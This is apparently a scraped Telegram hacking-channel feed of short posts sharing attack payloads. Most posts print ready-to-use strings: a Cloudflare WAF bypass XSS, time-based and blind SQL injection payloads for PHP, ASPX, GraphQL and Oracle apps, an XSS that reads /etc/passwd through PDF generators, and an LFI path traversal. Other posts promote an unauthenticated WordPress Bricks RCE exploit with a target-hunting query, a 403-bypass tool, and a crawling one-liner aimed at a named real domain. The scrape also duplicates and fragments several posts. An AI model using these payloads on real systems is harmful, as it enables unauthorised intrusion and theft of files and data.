Cloudflare WAF Bypass Leads to Reflected XSS ®️
Payload Used :⛔
Payload Used :
#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload Used :
"><img src=x onerror=alert(1)>
[Blocked By Cloudflare] Payload Used :
"><img src=x onerrora=confirm() onerror=confirm(1)>
[XSS Popup]#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥4❤2👍1👎1
7 SQLs
4 in php
1 in aspx
2 in graphql
#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
4 in php
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
1 in aspx
orwa';%20waitfor%20delay%20'0:0:6'%20--%20
2 in graphql
orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--
#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥9❤🔥3👍2
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡8❤🔥3🔥3👍1
Google Dorks to Find Sensitive data or dir
#google #cybersec #infosec
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
#google #cybersec #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8⚡3❤🔥1🔥1
Found SQL Injection in [org_id] Cookie
Payloads for Testing:
Injected in request like this
#BugBounty #Tips #SQL
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE
-1 OR 6=6 AND 0-0=> TRUE
Injected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0
#BugBounty #Tips #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7❤2🔥1💯1
#Notification #Warning
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7⚡2❤2🔥1💯1
This is very cool. Get cheatsheets in your terminal with a curl command!
⌨️ Try this:
#Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
curl https://cht.sh/sqlmap
#Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6⚡2❤1🔥1💯1
LearnExploit
#Osint #Telegram #Discord
Please open Telegram to view this post
VIEW IN TELEGRAM
✍5⚡3👍2❤1🔥1💯1
If you discover an oracle web app, you can use this payload
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
EHY01%27OR+1%3d1+AND+NVL(ASCII(SUBSTR((SELECT+chr(78)%7c%7cchr(69)%7c%7cchr(84)%7c%7cchr(83)%7c%7cchr(80) )%7c%7cchr(65)%7c%7cchr(82)%7c%7cchr(75)%7c%7cchr(69)%7c%7cchr(82)+FROM+DUAL)%2c9%2c1))%2c0) %3d82--
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
❤4👍2⚡1🔥1
NoMore403
Introduction:
Prerequisites:
Before you install and run
Installation:
Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.
Usage:
Github
⬇️ Download
#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Introduction:
nomore403
is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403
automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.Prerequisites:
Before you install and run
nomore403
, make sure you have the following:Go 1.15
or higher
installed on your machineInstallation:
cd nomore403
go get
go build
Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.
Usage:
./nomore403 -h
Github
⬇️ Download
🔒 LearnExploit
#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⚡7👍4
One line for subdomain
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
$(subfinder -d http://tesla.com| dnsx |httpx); do katana -u "$subdomain" -d 5 -jc -jsl -aff -kf all -mrs 5242880 -timeout 15 -retry 3 -s breadth-first -iqp -cs "$subdomain" -f url -sf url -rl 200 -p 20 -dr -nc -H -silent -fdc 'status_code == 404' ;done
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⚡7👎3👍2❤1
XSS to Exfiltrate Data from PDFs 🔥🥵
#xss
——————
0Day.Today
@LearnExploit
@Tech_Army
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>
#xss
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5👍5👎1
Quick and amazing LFI
#Lfi
——————
0Day.Today
@LearnExploit
@Tech_Army
filePath=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts
#Lfi
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡7👎3👍1